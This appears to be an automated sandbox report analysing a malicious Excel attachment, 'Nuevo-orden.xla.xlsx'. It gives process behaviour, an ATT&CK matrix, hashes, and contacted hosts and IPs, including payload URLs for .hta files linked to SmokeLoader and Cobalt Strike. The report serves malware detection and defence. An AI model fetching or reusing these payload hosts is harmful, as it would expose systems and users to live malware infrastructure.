Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Nuevo-orden.xla.xlsxStream path 'Workbook' entropy: 7.99874475743 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 805Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Nuevo-orden.xla.xlsx18%ReversingLabs
Nuevo-orden.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsage0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    s.deemos.com
    14.103.79.10
    truefalse
      high
      s-part-0017.t-0009.fb-t-msedge.net
      13.107.253.45
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://s.deemos.com/6ruXkfgh?&sherry=strange&octagon=fragile&initiative=rough&corsagefalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          14.103.79.10
          s.deemos.comChina
          18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
          192.3.27.144
          unknownUnited States
          36352AS-COLOCROSSINGUSfalse
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1586900
          Start date and time:2025-01-09 18:33:09 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 12s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:14
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Nuevo-orden.xla.xlsx
          Detection:MAL
          Classification:mal64.expl.winXLSX@6/4@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .xlsx
          • Changed system and user locale, location and keyboard layout to French - France
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Active ActiveX Object
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, MavInject32.exe
          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.109.28.46, 52.109.68.129, 52.113.194.132, 23.56.254.164, 199.232.214.172, 20.42.65.91, 52.182.143.214, 13.107.253.45, 20.190.159.75, 4.245.163.56, 13.107.246.45
          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedscolprdeus17.eastus.cloudapp.azure.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, dns.msftncsi.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: Nuevo-orden.xla.xlsx
          TimeTypeDescription
          12:35:14API Interceptor824x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          14.103.79.10PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
            PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
              PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                      SWIFT.xlsGet hashmaliciousUnknownBrowse
                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                          192.3.27.144sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                          • 192.3.27.144/250/evenmegoodfor.txt
                          begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                          • 192.3.27.144/250/evenmegoodfor.txt
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s.deemos.comPO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          s-part-0017.t-0009.fb-t-msedge.netNotification of a Compromised Email Account.msgGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://combatironapparel.com/collections/ranger-panty-shortsGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://meliopayments.cloudfilesbureau.com/j319CGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.253.45
                          Setup64v9.9.8.msiGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                          • 13.107.253.45
                          Play_VM-NowAccountingAudiowav011.htmlGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeGet hashmaliciousXWormBrowse
                          • 13.107.253.45
                          https://www.dollartip.info/unsubscribe/?d=mdlandrec.netGet hashmaliciousUnknownBrowse
                          • 13.107.253.45
                          invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                          • 13.107.253.45
                          invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                          • 13.107.253.45
                          bg.microsoft.map.fastly.netAppraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          new.batGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5.zipGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                          • 199.232.210.172
                          bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                          • 199.232.210.172
                          GT98765009064.xlsxGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          SmartDeploy.exeGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                          • 199.232.214.172
                          EEdSGSana5.exeGet hashmaliciousAsyncRATBrowse
                          • 199.232.210.172
                          Magicleap-bonus disbursment.pdfGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WORLDPHONE-INASNumberforInterdomainRoutingINPO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          miori.m68k.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.215
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          SWIFT.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          Owari.arm.elfGet hashmaliciousUnknownBrowse
                          • 14.103.40.223
                          AS-COLOCROSSINGUSsh4.elfGet hashmaliciousMiraiBrowse
                          • 23.95.117.229
                          sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                          • 192.3.27.144
                          begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                          • 192.3.27.144
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 192.3.27.144
                          miori.ppc.elfGet hashmaliciousUnknownBrowse
                          • 192.210.142.114
                          9876567899.bat.exeGet hashmaliciousLokibotBrowse
                          • 172.245.123.11
                          arm5.elfGet hashmaliciousUnknownBrowse
                          • 104.168.33.8
                          mips.elfGet hashmaliciousUnknownBrowse
                          • 104.168.33.8
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          6271f898ce5be7dd52b0fc260d0662b3phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                          • 14.103.79.10
                          ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          skript.batGet hashmaliciousVidarBrowse
                          • 14.103.79.10
                          GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                          • 14.103.79.10
                          NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          L82esnUTxK.exeGet hashmaliciousUnknownBrowse
                          • 14.103.79.10
                          No context
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):118
                          Entropy (8bit):3.5700810731231707
                          Encrypted:false
                          SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                          MD5:573220372DA4ED487441611079B623CD
                          SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                          SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                          SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):784
                          Entropy (8bit):2.7137690747287806
                          Encrypted:false
                          SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                          MD5:09F73B3902CD3D88E04312787956B654
                          SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                          SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                          SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):512
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3::
                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                          Malicious:false
                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.7769794087092887
                          Encrypted:false
                          SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                          MD5:37BD8218D560948827D3B948CAFA579C
                          SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                          SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                          SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                          Malicious:true
                          Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 9 12:54:19 2025, Security: 1
                          Entropy (8bit):7.730868275434714
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:Nuevo-orden.xla.xlsx
                          File size:1'091'584 bytes
                          MD5:3851138774f61b2de118337f4c787f57
                          SHA1:5550ce43b2bf41ba056404a0924e458e3954af80
                          SHA256:2b14225a0e97081a7142e16423136b06c17cea24ed34b9e696864823468d7dfc
                          SHA512:7217c8de08b1215eed9ec8b08af7774ca2589d51bf973f44ff1f8893b34bf91668963d68496aa260f5856d4048a29045b46d01243405952bfea719fcb69dfffd
                          SSDEEP:24576:fea3tjAb1ZbcPBsTYkX3bV/bARM8Dt23USiYZ+ao8IzmBl:f53lgkP28kX3bVEcktaJl
                          TLSH:7535F0D2BA8D9B52C926073075F34B9E1721AC07E962827B22F4731D6BF76D08503F96
                          File Content Preview:........................>...............................................................................A...B...................s.......u......................................................................................................................
                          Icon Hash:35e58a8c0c8a85b9
                          Document Type:OLE
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:Microsoft Excel
                          Encrypted Document:True
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:True
                          Code Page:1252
                          Author:
                          Last Saved By:
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2025-01-09 12:54:19
                          Creating Application:Microsoft Excel
                          Security:1
                          Document Code Page:1252
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:786432
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1.cls
                          Stream Size:977
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G . s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 47 ce a5 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Attribute VB_Name = "Sheet1"
                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                          Attribute VB_GlobalNameSpace = False
                          Attribute VB_Creatable = False
                          Attribute VB_PredeclaredId = True
                          Attribute VB_Exposed = True
                          Attribute VB_TemplateDerived = False
                          Attribute VB_Customizable = True
                          

                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                          VBA File Name:Sheet2.cls
                          Stream Size:977
